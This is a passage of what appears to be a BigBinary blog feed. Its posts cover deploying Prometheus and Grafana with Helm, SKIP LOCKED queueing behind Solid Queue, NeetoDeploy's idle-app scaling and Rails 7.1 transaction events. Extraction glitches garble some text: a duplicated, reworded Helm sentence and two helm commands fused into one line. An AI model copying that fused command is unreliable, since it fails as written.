visualization capabilities, making it easier to understand complex data.</li><li><strong>Open Source:</strong> Both Prometheus and Grafana are open-source, reducing monitoring costs.</li><li><strong>Community Support:</strong> We can benefit from active communities, ensuring continuous development and support.</li><li><strong>Integration:</strong> They seamlessly integrate with other Kubernetes components and applications, simplifying setup.</li><li><strong>Historical Data:</strong> Grafana allows us to explore historical data, aiding in long-term analysis and trend identification.</li><li><strong>Extensible:</strong> Both tools are extensible, allowing us to integrate additional data sources and plugins.</li><li><strong>Efficient Resource Usage:</strong> Prometheus efficiently utilizes resources, ensuring minimal impact on our cluster's performance.</li></ul><p>There are two common ways to use Prometheus and Grafana on Kubernetes:</p><ol><li><strong>Manual Kubernetes deployment</strong>: In this method, we need to write <a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment/">Kubernetes Deployments</a> and <a href="https://kubernetes.io/docs/concepts/services-networking/service/">Services</a> for both Prometheus and Grafana. In the YAML files, we need to put all the settings for Prometheus and Grafana on Kubernetes. Then we apply these files to our Kubernetes cluster. But we can end up with many YAML files, which can be hard to manage. If we make a mistake in any YAML file, Prometheus and Grafana won't work on Kubernetes.</li><li><strong>Using Helm</strong>: This is an easy way to deploy any application container to Kubernetes. <a href="https://helm.sh/">Helm</a> is the official package manager for Kubernetes. With Helm, we can make installing, deploying, and managing 
With Helm, we can make installing, sending, and managingKubernetes makes applications easier.</li></ol><p>A<a href="https://helm.sh/">Helm Chart</a>has all the YAML files:</p><ul><li>Deployments.</li><li>Services.</li><li>Secrets.</li><li>ConfigMaps manifests.</li></ul><p>We use these files to send the application container to Kubernetes. Instead ofmaking individual YAML files for each application container, Helm lets usdownload Helm charts that already have YAML files.</p><h2>Setting up Prometheus and Grafana using Helm chart</h2><p>We will use <a href="https://artifacthub.io/">ArtifactHub</a>, which offers public andprivate repositories for Helm Charts. We will use these Helm Charts to arrangethe pods and services in our Kubernetes cluster.</p><p>To get Prometheus and Grafana working on Kubernetes with Helm, we will start byinstalling Helm.</p><h4>Installing Helm on Linux</h4><pre><code class="language-bash">sudo apt-get install helm</code></pre><h4>Installing Helm on Windows</h4><pre><code class="language-bash">choco install Kubernetes-helm</code></pre><h4>Installing Helm on macOS</h4><pre><code class="language-bash">brew install helm</code></pre><p>We can check out the official<a href="https://helm.sh/docs/intro/install/">Helm documentation</a> if we run into anyissues while installing Helm.</p><p>The image below represents the successful Helm installation on macOS.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-01_at_1.09.49_PM.png" alt="Screenshot 2023-11-01 at 1.09.49PM.png"></p><p>For this blog, were going to install Helm<a href="https://artifacthub.io/packages/helm/prometheus-community/kube-prometheus-stack">chart</a>and by default, this chart also installs additional, dependent charts (includingGrafana):</p><ul><li><a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-state-metrics">prometheus-community/kube-state-metrics</a></li><li><a 
href="https://github.com/prometheus-community/helm-charts/tree/main/charts/prometheus-node-exporter">prometheus-community/prometheus-node-exporter</a></li><li><a href="https://github.com/grafana/helm-charts/tree/main/charts/grafana">grafana/grafana</a></li></ul><p>To get this Helm chart, let's run this command:</p><pre><code class="language-bash">helm repo add prometheus-community https://prometheus-community.github.io/helm-chartshelm repo update</code></pre><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-01_at_1.15.43_PM.png" alt="Screenshot 2023-11-01 at 1.15.43PM.png"></p><p>We have downloaded the latest version of Prometheus &amp; Grafana.</p><p>To install the Prometheus Helm Chart on a Kubernetes Cluster, let's run thefollowing command:</p><pre><code class="language-bash">helm install my-kube-prometheus-stack prometheus-community/kube-prometheus-stack</code></pre><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-01_at_1.21.46_PM.png" alt="Screenshot 2023-11-01 at 1.21.46PM.png"></p><p>We have successfully installed Prometheus &amp; Grafana on the Kubernetes Cluster.We can access the Prometheus &amp; Grafana servers via ports 9090 &amp; 80,respectively.</p><p>Now, let's run the followingcommand to view all the resources created by theHelm Chart in our Kubernetes cluster:</p><pre><code class="language-bash">kubectl get all</code></pre><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_11.19.39_AM.png" alt="Screenshot 2023-11-02 at 11.19.39AM.png">The Helm chart created the following resources:</p><ul><li><strong>Pods</strong>: It hosts the deployed Prometheus Kubernetes application inside thecluster.</li><li><strong>Replica Sets</strong>: A collection of instances of the same application inside theKubernetes cluster. 
It enhances application reliability.</li><li><strong>Deployments</strong>: They are the blueprints for creating the application pods.</li><li><strong>Services</strong>: They expose the pods running inside the Kubernetes cluster. We use them to access the deployed Kubernetes application.</li><li><strong>Stateful Sets</strong>: They manage the deployment of stateful application components and ensure stable and predictable network identities for these components.</li><li><strong>Daemon Sets</strong>: They ensure that all (or a specific set of) nodes run a copy of a pod, which is useful for tasks such as logging, monitoring, and other node-specific operations.</li></ul><p>Run this command to view all the Kubernetes Services for Prometheus &amp; Grafana:</p><pre><code class="language-bash">kubectl get service</code></pre><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_11.37.39_AM.png" alt="Screenshot 2023-11-02 at 11.37.39 AM.png"></p><p>The listed services for Prometheus and Grafana are:</p><ul><li>alertmanager-operated</li><li>kube-prometheus-stack-alertmanager</li><li>kube-prometheus-stack-grafana</li><li>kube-prometheus-stack-kube-state-metrics</li><li>kube-prometheus-stack-operator</li><li>kube-prometheus-stack-prometheus</li><li>kube-prometheus-stack-prometheus-node-exporter</li><li>prometheus-operated</li></ul><p><code>kube-prometheus-stack-grafana</code> and <code>kube-prometheus-stack-prometheus</code> are <code>ClusterIP</code> type services, which means we can only access them within the Kubernetes cluster.</p><p>To expose Prometheus and Grafana outside the Kubernetes cluster, we can use either a NodePort or a LoadBalancer service.</p><h2>Exposing Prometheus and Grafana using NodePort services</h2><p>Let's run the following commands to expose the <code>Prometheus</code> and <code>Grafana</code> Kubernetes services:</p><pre><code class="language-bash">kubectl expose service kube-prometheus-stack-prometheus --type=NodePort --target-port=9090 --name=prometheus-node-port-service
kubectl expose service kube-prometheus-stack-grafana --type=NodePort --target-port=3000 --name=grafana-node-port-service</code></pre><p>These commands will create new services of <code>NodePort</code> type and make Prometheus and Grafana accessible outside the Kubernetes Cluster.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_11.59.15_AM.png" alt="Screenshot 2023-11-02 at 11.59.15 AM.png"></p><p>As we can see, the <code>grafana-node-port-service</code> and <code>prometheus-node-port-service</code> are successfully created and are exposed on node ports <code>32489</code> &amp; <code>30905</code>.</p><p>Now, we can run this command and get the external IP of any node to access Prometheus and Grafana:</p><pre><code class="language-bash">kubectl get nodes -o wide</code></pre><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_11.57.17_AM.png" alt="Screenshot 2023-11-02 at 11.57.17 AM.png"></p><p>We can use the External-IP and the node ports to access the Prometheus and Grafana dashboards outside the cluster environment.</p><p>Prometheus Dashboard</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.04.36_PM.png" alt="Prometheus Dashboard"></p><p>Grafana Dashboard</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.04.53_PM.png" alt="Grafana Dashboard"></p><p>Run this command to get the password for the <strong>admin</strong> user of the Grafana dashboard:</p><pre><code class="language-bash">kubectl get secret --namespace default kube-prometheus-stack-grafana -o jsonpath=&quot;{.data.admin-password}&quot; | base64 --decode ; echo</code></pre><h2>Grafana Dashboard</h2><p>Upon logging in to the Grafana dashboard, use <code>admin</code> as the username and the generated password. 
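</p><p>As a quick local alternative (a sketch using the service names created by this chart), we can skip the NodePort services entirely and temporarily forward the dashboards to localhost with <code>kubectl port-forward</code>:</p><pre><code class="language-bash"># Forward Grafana (service port 80) to localhost:3000
kubectl port-forward svc/kube-prometheus-stack-grafana 3000:80

# Forward Prometheus (service port 9090) to localhost:9090
kubectl port-forward svc/kube-prometheus-stack-prometheus 9090:9090</code></pre><p>While the forwards are running, Prometheus is reachable at http://localhost:9090 and Grafana at http://localhost:3000; this is handy for testing but, unlike NodePort, only works from the machine running kubectl.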
We will see the &quot;Welcome to Grafana&quot; homepage as shown below.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.12.04_PM.png" alt="Screenshot 2023-11-02 at 12.12.04 PM.png"></p><p>Since we used the kube-prometheus-stack Helm chart, the data sources for Prometheus and Alertmanager are added by default.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.18.14_PM.png" alt="Screenshot 2023-11-02 at 12.18.14 PM.png"></p><p>We can add more data sources by clicking on the <strong>Add new data source</strong> button on the top right side.</p><p>By default, this Helm chart adds multiple dashboards to monitor the health of the Kubernetes cluster and its resources.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.22.37_PM.png" alt="Screenshot 2023-11-02 at 12.22.37 PM.png"></p><p>Additionally, we also have the option of creating our own dashboards from scratch, as well as importing the many Grafana dashboards provided by the <a href="https://grafana.com/grafana/dashboards/">Grafana library</a>.</p><p>To import a Grafana Dashboard, let's follow these steps:</p><ul><li><p>From the <a href="https://grafana.com/grafana/dashboards/">Grafana library</a>, we can pick any dashboard</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.28.44_PM.png" alt="Screenshot 2023-11-02 at 12.28.44 PM.png"></p></li><li><p>Select the dashboard and copy the Dashboard ID</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.34.54_PM.png" alt="Screenshot 2023-11-02 at 12.34.54 PM.png"></p></li><li><p>Under the <strong>Dashboards</strong> page, we can find the <strong>Import</strong> option</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.32.55_PM.png" alt="Screenshot 2023-11-02 at 12.32.55 PM.png"></p></li><li><p>Under the &quot;Import Dashboard&quot; 
page, we need to paste the Dashboard ID that we copied earlier &amp; click on the <strong>Load</strong> button.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.35.39_PM.png" alt="Screenshot 2023-11-02 at 12.35.39 PM.png"></p></li><li><p>After clicking on the <strong>Load</strong> button, it will auto-load the dashboard from the library, after which we can import the dashboard by clicking on the <strong>Import</strong> button.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.37.50_PM.png" alt="Screenshot 2023-11-02 at 12.37.50 PM.png"></p></li><li><p>Once the import is complete, we'll be redirected to the newly imported dashboard, which will also be visible under the Dashboards page.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.39.42_PM.png" alt="Screenshot 2023-11-02 at 12.39.42 PM.png"></p><p>We can use this Node Exporter dashboard to monitor &amp; observe the health of the nodes present in our Kubernetes Cluster.</p></li></ul><h2>Conclusion</h2><p>In this blog, we learned how to integrate Prometheus and Grafana using the Helm chart. We also learned how to import dashboards into Grafana from the <a href="https://grafana.com/grafana/dashboards/">Grafana library</a>.</p><p>In the next blog, we will explore how to integrate <a href="https://grafana.com/oss/loki/">Grafana Loki</a> with Grafana and collect and store event-related metrics using the <a href="https://github.com/resmoio/kubernetes-event-exporter">Kubernetes Event Exporter</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Solid Queue & understanding UPDATE SKIP LOCKED]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/solid-queue"/>
      <updated>2024-01-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/solid-queue</id>
      <content type="html"><![CDATA[<h2>What is Solid Queue?</h2><p>Recently, <a href="https://37signals.com/">37signals</a> open sourced <a href="https://dev.37signals.com/introducing-solid-queue">Solid Queue</a>.</p><p>Solid Queue is a database-backed queuing backend for Active Job. In contrast, Sidekiq and Resque are Redis-based queuing backends.</p><p>In her blog, <a href="https://github.com/rosa">Rosa Gutiérrez</a> mentioned the following lines, which captured our attention.</p><blockquote><p>In our case, one feature that PostgreSQL has had for quite some time and that was finally introduced in MySQL 8, has been crucial to our implementation:</p><p>SELECT ... FOR UPDATE SKIP LOCKED</p><p>This allows Solid Queue's workers to fetch and lock jobs without locking other workers.</p></blockquote><p>As per her, this feature had been <a href="https://www.postgresql.org/docs/current/sql-select.html#SQL-FOR-UPDATE-SHARE">in PostgreSQL</a> for a while, and now this feature has landed <a href="https://dev.mysql.com/blog-archive/mysql-8-0-1-using-skip-locked-and-nowait-to-handle-hot-rows">in MySQL</a>, making it possible to build Solid Queue.</p><p>We had never heard of the <code>UPDATE SKIP LOCKED</code> feature either in PostgreSQL or in MySQL. We were wondering what this <code>UPDATE SKIP LOCKED</code> is, without which it was not possible to build Solid Queue. So we decided to look into it.</p><h2>Processing jobs from a queue</h2><p>Consider a case where we need to build a system where a bunch of jobs need to be processed in the background.</p><p>There are a bunch of workers waiting to grab a job and start processing the moment a job becomes available. The challenge is, when multiple workers attempt to claim the same job simultaneously, how do we ensure that only one of the workers claims the job for processing? 
At any point of time, a worker should claim only an &quot;unclaimed&quot; job, and an &quot;unclaimed&quot; job should be claimed by one and only one worker.</p><p>Here is how one might go about implementing it.</p><pre><code class="language-sql">START TRANSACTION;
SELECT * FROM jobs WHERE processed='no' LIMIT 1;
-- Process the job
COMMIT;</code></pre><p>With the above code, it's possible that two workers might claim the same job.</p><p>One way to resolve this issue is by marking a particular row as locked for update.</p><pre><code class="language-sql">START TRANSACTION;
SELECT * FROM jobs WHERE processed='no' LIMIT 1 FOR UPDATE;
-- Process the job
COMMIT;</code></pre><p><code>SELECT ... FOR UPDATE</code> locks a particular row, and hence no one else can lock that record.</p><p>As soon as a new job comes in, multiple workers will execute the above query and will try to take a lock on that record. The database will ensure that only one of the workers gets the lock.</p><p>The first worker will take the lock on the record using <code>FOR UPDATE</code>. When other workers come to that record and see that there is a <code>FOR UPDATE</code> lock, they will wait for the lock to be lifted. Yes, these workers will wait until the lock is released.</p><p>The lock will only be released when the transaction is committed. When the transaction is committed and the lock is released, the other workers will get hold of the record only to find that the job has already been processed. As you can see, this is a highly inefficient process.</p><p>That is where <code>FOR UPDATE SKIP LOCKED</code> comes in.</p><h2>SKIP LOCKED skips locked rows</h2><pre><code class="language-sql">START TRANSACTION;
SELECT * FROM jobs WHERE processed='no' LIMIT 1 FOR UPDATE SKIP LOCKED;
-- Process the job
COMMIT;</code></pre><p>Imagine the same scenario here. A job comes in. Multiple workers compete to claim the job. The database ensures that only one worker gets the lock. 
However, in this case, the other workers will move on to the next record. They will not wait. That's what <code>SKIP LOCKED</code> does.</p><p>MySQL has detailed documentation on <a href="https://dev.mysql.com/blog-archive/mysql-8-0-1-using-skip-locked-and-nowait-to-handle-hot-rows/">how SKIP LOCKED works</a> if you want to read about it in more detail.</p><p>Solid Queue uses the <code>FOR UPDATE SKIP LOCKED</code> feature to ensure that a job is claimed by only one worker.</p><h2>How GoodJob manages job processing without SKIP LOCKED</h2><p><a href="https://github.com/bensheldon/good_job">GoodJob</a> burst onto the scene <a href="https://island94.org/2020/07/introducing-goodjob-1-0">around July 2020</a>. GoodJob supports only the PostgreSQL database because it uses advisory locks to guarantee that no two workers claim the same job.</p><p>The PostgreSQL folks understood that the lock mechanisms provided by the database would not satisfy all the variety of cases that might arise in an application. Advisory locks are a mechanism that allows applications to establish a communication channel to coordinate actions between different sessions or transactions. Unlike regular row-level locks enforced by the database system, advisory locks are implemented as a set of low-level functions that applications can use to acquire and release locks based on their requirements. We can read more about them <a href="https://www.postgresql.org/docs/current/explicit-locking.html#ADVISORY-LOCKS">here</a>.</p><p>The <a href="https://www.postgresql.org/docs/9.1/functions-admin.html#FUNCTIONS-ADVISORY-LOCKS">pg_advisory_lock function</a> will lock the given resource. However, if another session already holds a lock on the same resource, then this function will wait. This is similar to the <code>FOR UPDATE</code> case we saw above.</p><p>However, the <code>pg_try_advisory_lock</code> function will either obtain the lock immediately and return true, or return false if the lock cannot be acquired immediately. 
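</p><p>A minimal sketch of this try-lock pattern in plain SQL (the lock key <code>42</code> is an arbitrary, application-chosen number for illustration, not something taken from GoodJob's implementation):</p><pre><code class="language-sql">-- Returns true if the lock on key 42 was acquired, false otherwise; never blocks
SELECT pg_try_advisory_lock(42);

-- ... process the claimed job ...

-- Release the session-level lock once the work is done
SELECT pg_advisory_unlock(42);</code></pre><p>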
As you can see, the name has the word <code>try</code>. This function attempts to acquire a lock. If it can't get the lock, then it won't wait. This function can be utilized to build a queuing system.</p><p>Any usage of an advisory lock means the application needs to coordinate the action. It gives more power to the application, but it also means more work for the application. In contrast, <code>FOR UPDATE SKIP LOCKED</code> is natively supported by PostgreSQL.</p><p>Based on the discussions <a href="https://github.com/bensheldon/good_job/issues/896">here</a> and <a href="https://github.com/bensheldon/good_job/discussions/831#discussioncomment-6780579">here</a>, it seems GoodJob is evaluating the possibility of migrating from advisory locks to using <code>FOR UPDATE SKIP LOCKED</code> for better performance. Going through these issues was quite revealing, and I got to learn a lot about things I was unaware of.</p><h2>Delayed Job implementation</h2><p><a href="https://github.com/collectiveidea/delayed_job">DelayedJob</a> has been there since 2009, long before Sidekiq. It doesn't use <code>SKIP LOCKED</code>. Instead, it uses a row-level locking system by <a href="https://github.com/tobi/delayed_job/blob/719b628bdd54566f80ae3a99c4a02dd39d386c07/lib/delayed/job.rb#L164-L181">updating a field in the job record</a> to indicate that the job is being processed. In short, DelayedJob ensures that no two workers take the same job at the application level, without taking any help in this direction from the database.</p><h2>What about SQLite?</h2><p>So far, we have discussed PostgreSQL and MySQL. What about SQLite? Does it support <code>SKIP LOCKED</code>? No, it doesn't, but that's OK. As per the <a href="https://www.sqlite.org/whentouse.html#dbcklst">documentation</a>, it supports only one writer at any instant in time.</p><blockquote><p>High Concurrency</p><p>SQLite supports an unlimited number of simultaneous readers, but it will only allow one writer at any instant in time. 
For many situations, this is not a problem. Writers queue up. Each application does its database work quickly and moves on, and no lock lasts for more than a few dozen milliseconds. But there are some applications that require more concurrency, and those applications may need to seek a different solution.</p></blockquote><h2>NOWAIT</h2><p>For completeness, let's discuss the <code>NOWAIT</code> feature. We saw earlier that if we take a lock on a row using <code>FOR UPDATE</code>, then other workers will wait until the lock is released.</p><pre><code class="language-sql">START TRANSACTION;
SELECT * FROM jobs WHERE processed='no' LIMIT 1 FOR UPDATE NOWAIT;
-- Process the job
COMMIT;</code></pre><p>The <code>NOWAIT</code> feature allows other transactions not to wait for the lock to be released. In this case, if a transaction is not able to get a lock on the given row, then it will raise an error, and the application needs to handle the error.</p><p>In contrast, <code>SKIP LOCKED</code> will allow the transaction to move on to the next row if a lock is already taken.</p><h2>Redis-backed queue vs database-backed queue</h2><p>Now that we have looked at how <code>FOR UPDATE SKIP LOCKED</code> helps build a queuing system using the database itself, let's see some pros and cons of each type of queuing system.</p><h4>Simplicity and familiarity</h4><p>Database-backed queues are often simpler to set up and manage, especially if your application is already using a relational database. There's no need for an additional dependency like Redis.</p><h4>No additional infrastructure</h4><p>Since the job information is stored in the same database as your application data, you don't need to set up and maintain a separate infrastructure like a Redis server.</p><h4>Transactionality</h4><p>Database-backed queues can leverage database transactions, ensuring that both the job creation and any related database operations are committed or rolled back together. 
This can be important in scenarios where data consistency is critical.</p><h4>Modifiability</h4><p>It is easier to modify the jobs stored in the database than in Redis, but doing so requires caution, and it's generally not recommended. In Redis, jobs are often stored as serialized data, and modifying them directly is not as straightforward or common. Redis provides commands to interact with data, but modifying job data directly is not a standard practice and could result in data corruption.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we added sleep when idle feature to NeetoDeploy and reduced cost]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps"/>
      <updated>2024-01-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps</id>
      <content type="html"><![CDATA[<p><em>We are building <a href="https://neeto.com/neetoDeploy">NeetoDeploy</a>, a compelling Heroku alternative. Stay updated by following NeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a> and reading our <a href="https://www.bigbinary.com/blog/categories/neetodeploy">blog</a>.</em></p><h2>What is the sleep when idle feature</h2><p>&quot;Sleep when idle&quot; is a feature of NeetoDeploy which puts the deployed application to sleep when there is no hit to the server for 5 minutes. This helps reduce the cost of the server.</p><p>The &quot;sleep when idle&quot; feature can be enabled not only for pull request review applications, but for staging and production applications too. Many folks build applications to learn and as a hobby. In such cases, there is no point in running the server when it is not likely to get any traffic. Since NeetoDeploy billing is based on usage, the &quot;sleep when idle&quot; feature helps keep the bill low for the users.</p><p>Let's say you built something and deployed it to production. You shared it with your friends. For a day or two you got a bit of traffic, and after that you moved on to other things. If &quot;sleep when idle&quot; is enabled, then you don't need to worry about anything. If the server is not getting any traffic, then you will not be billed.</p><h2>How is Neeto using the sleep when idle feature</h2><p>At <a href="https://neeto.com">neeto</a>, we are building 20+ applications at the same time. That means lots of pull requests for all these products, and thus lots of PR review apps are created.</p><p>For a long time, we were using Heroku to build the review apps. However, when NeetoDeploy started to become stable, we moved the generation of PR review apps from Heroku to NeetoDeploy. 
This helped reduce cost.</p><h2>How to make deployments sleep when idle?</h2><p>This video describes how the &quot;sleep when idle&quot; feature is implemented.</p><iframe width="560" height="315" src="https://youtube.com/embed/trn2DJyTjnw" frameborder="0" title="How we designed NeetoDeploy's 'sleep when idle' feature" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><p>Keeping the apps running only when they're being used involves two steps:</p><ol><li>Scaling the deployments down and bringing them back up again</li><li>Figuring out when to do the scaling</li></ol><p>The deployments can be scaled easily using the <code>kubectl scale</code> command. For example, if we want to turn our deployment off, we can run the following to update our deployment to zero replicas, essentially destroying all the pods.</p><pre><code class="language-bash">kubectl scale deployment/nginx --replicas=0</code></pre><p>We can also delete our service, ingress or any other resource we might have created for our deployment. The configuration of the deployment itself would still be present in the cluster even when we make it sleep, since the Kubernetes Deployment is not deleted.</p><p>When we want to bring our app back up again, we can use the same command to spin up new pods:</p><pre><code class="language-bash">kubectl scale deployment/nginx --replicas=1</code></pre><p>The challenge was to figure out <em>when</em> to do this. We decided that we'd have a threshold based on the time the app was last accessed by users. If the application is not accessed for more than five minutes, we consider the application to be idle and we will scale it down. 
It'll be brought back up when a user tries to access it again.</p><h2>Exploring existing solutions</h2><p>There are existing CNCF projects like <a href="https://knative.dev/">Knative</a> and <a href="https://keda.sh/">Keda</a>, which can potentially be used to achieve what we want here. We spent some time exploring these but realized that these solutions weren't exactly suitable for our requirements. Kubernetes also natively has a <code>HPAScaleToZero</code> <a href="https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates">feature gate</a> which enables the <a href="https://www.bigbinary.com/blog/solving-scalability-in-neeto-deploy#understanding-kubernetes-autoscalers">Horizontal Pod Autoscaler</a> to scale down deployments to zero pods, but this is still in alpha and, hence, is not available in EKS yet.</p><p>Ultimately, we decided to write our own service for achieving this. The entire backend of NeetoDeploy was designed as <a href="https://www.bigbinary.com/blog/neeto-deploy-zero-to-one">a collection of microservices</a> from day one. So it made sense to build our <em>pod idling service</em> as another microservice that runs in our cluster.</p><h2>Figuring out when to make applications sleep</h2><p>To know when applications can be idled, we need to know when people are accessing the applications from their browsers. Since all the requests to applications deployed on NeetoDeploy go through our load balancer, it contains the information of when every app was last accessed.</p><p>We use <a href="https://traefik.io/traefik/">Traefik</a> as our load balancer, and we used Traefik's <a href="https://doc.traefik.io/traefik/middlewares/overview/">middlewares</a> to retrieve and process the information of when apps are being accessed. We wrote a custom middleware to send all the request information to the pod idling service whenever an app is being accessed. 
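</p><p>The five-minute idle filter can be sketched as follows. This is an illustrative Python sketch, not the service's actual code; the app names are hypothetical, and a plain dict stands in for the Redis cache of last-access timestamps.</p><pre><code class="language-python">import time

IDLE_THRESHOLD_SECONDS = 300  # five minutes, per the idling policy above

# A dict stands in for the Redis cache mapping each app to the Unix
# timestamp at which it was last accessed (app names are hypothetical).
def find_idle_apps(last_accessed, now=None):
    now = now if now is not None else time.time()
    return [
        app
        for app, accessed_at in last_accessed.items()
        if now - accessed_at > IDLE_THRESHOLD_SECONDS
    ]

# One app was accessed ten minutes ago, the other just now.
apps = {"blog-pr-42": time.time() - 600, "store-pr-7": time.time()}
print(find_idle_apps(apps))  # ['blog-pr-42']</code></pre><p>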
The pod idling service would store all the URLs, along with the timestamp at which they were accessed, in a Redis cache. The following graphic shows how the request information would be collected and stored by the pod idling service into its Redis cache, both of which are running within the cluster.</p><p><img src="/blog_images/2024/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps/pod-idling-new-architecture.png" alt="The architecture of the pod idling service"></p><p>The pod idling service would then filter the apps that were last accessed more than five minutes ago. It then sends a request to the cluster to scale all these apps down. We'd also delete any related resources, like the Services and the IngressRoutes used to configure networking for the deployments.</p><p>We first tested this by running the service manually, and sure enough, all the inactive deployments were filtered and scaled properly. We then added this as a cron job in the pod idling service, which would run every five minutes. This means that no app would run for more than five minutes if it's not being used.</p><p>But wait! How would we bring the app back up after scaling it down?</p><h2>Building the downtime service</h2><p>As we discussed above, we use Traefik's IngressRoutes to route traffic to the application being accessed. We made use of the <a href="https://doc.traefik.io/traefik/v2.10/routing/routers/#priority_1">priority parameter</a> of IngressRoutes to boot up apps that are sleeping. Essentially, we created a wildcard Traefik IngressRoute that points to a &quot;downtime service&quot; deployment, which is a React app that serves a message of <code>There's nothing here, yet</code> to let users know that the app they're trying to access doesn't exist. 
You can see this in action if you visit a random URL in NeetoDeploy, say something like <a href="https://nonexistent-appname.neetodeployapp.com">nonexistent-appname.neetodeployapp.com</a></p><p><img src="/blog_images/2024/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps/downtime-service-page.png" alt="The downtime service page"></p><p>Wildcard IngressRoutes have the least priority by default. So if we create a &quot;catch-all&quot; wildcard IngressRoute, any invalid URL without an IngressRoute of its own can be redirected to a single Service in Kubernetes. This is how we're redirecting non-existent apps to the page shown above. In the following graphic, we can see how a request to a random URL is routed to the downtime service with the wildcard IngressRoute.</p><p><img src="/blog_images/2024/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps/downtime-service-architecture.png" alt="Architecture of how the downtime service works in NeetoDeploy"></p><p>This also means that if an app is scaled down by the pod idling service and gets its IngressRoute deleted, the next time a user tries to access the app, the request would instead be routed to the downtime service. We need to handle the scale-up logic from the downtime service.</p><p>Whenever a user requests a URL that doesn't have an IngressRoute, there are two possibilities.</p><ol><li>The app doesn't exist.</li><li>The app exists, but is currently scaled down.</li></ol><p>The downtime service would first check whether the requested app is present in the cluster in a sleeping state. If not, the user is served the &quot;There's nothing here, yet&quot; page. If there is a sleeping deployment, however, we boot it back up. The downtime service sends the scale-up request to the cluster. We keep redirecting the user back to the URL till the app is up and running. 
This redirection keeps happening until the app is scaled up, since we create the Service and IngressRoute only after the pods of the app are running. At this point, the request is routed to the correct pod by the app's IngressRoute, since it has a higher priority than the wildcard IngressRoute of the downtime service. All of these steps are illustrated in the GIF below:</p><p><img src="/blog_images/2024/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps/downtime-service.gif" alt="Illustration of how the downtime service works"></p><p>This design worked flawlessly, and we were able to bring back scaled-down applications with as little as 20-30 seconds of wait time.</p><h2>Conclusion</h2><p>We've been running this setup for almost a year now, and it has been working smoothly so far. The pod idling service and the downtime service started as simple microservices and continue to evolve, adapting to the increasing demand as we grow.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without any change. If you want to give NeetoDeploy a try, then please send us an email at invite@neeto.com.</p><p>If you have questions about NeetoDeploy or want to see the journey, follow NeetoDeploy on <a href="https://twitter.com/neetodeploy">X</a>. You can also join our <a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about any Neeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 allows subscribing to Active Record transaction events for instrumentation]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-allows-subscribing-to-active-record-transaction-events"/>
      <updated>2024-01-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-allows-subscribing-to-active-record-transaction-events</id>
      <content type="html"><![CDATA[<p>The Active Support instrumentation API provides us with hooks that allow us to choose to be notified when certain events occur inside our application. Rails provides a set of built-in events that we can subscribe to. <a href="https://edgeguides.rubyonrails.org/active_support_instrumentation.html#rails-framework-hooks">Here</a> is the list of framework hooks.</p><p>One of the recent additions to this is the <code>transaction.active_record</code> event, which is triggered when Active Record-managed transactions occur. This is particularly useful if you want to build a monitoring system like New Relic, where you need to track and analyze database transactions for performance monitoring and optimization purposes.</p><p>The event payload contains the connection, outcome, and the timing details. The connection helps us identify the database where the transaction occurred, which is particularly valuable in a multi-database environment. The outcome, which may be one of the following: <code>:commit</code>, <code>:rollback</code>, <code>:restart</code>, or <code>:incomplete</code>, signifies the transaction's result.</p><p>To make use of this, we can subscribe to the event in an initializer <code>config/initializers/events.rb</code> like this.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe(
  &quot;transaction.active_record&quot;
) do |event|
  MetricsLogger.record_transaction(event.payload)
end</code></pre><p>In the above example, <code>MetricsLogger</code> is responsible for recording the transaction details. It then analyzes and reports slow transactions so that proper action can be taken. You can modify this to suit your instrumentation needs.</p><p>Please check out these pull requests - <a href="https://github.com/rails/rails/pull/49192">1</a>, <a href="https://github.com/rails/rails/pull/49262">2</a> for more details.</p>]]></content>
    </entry><entry>
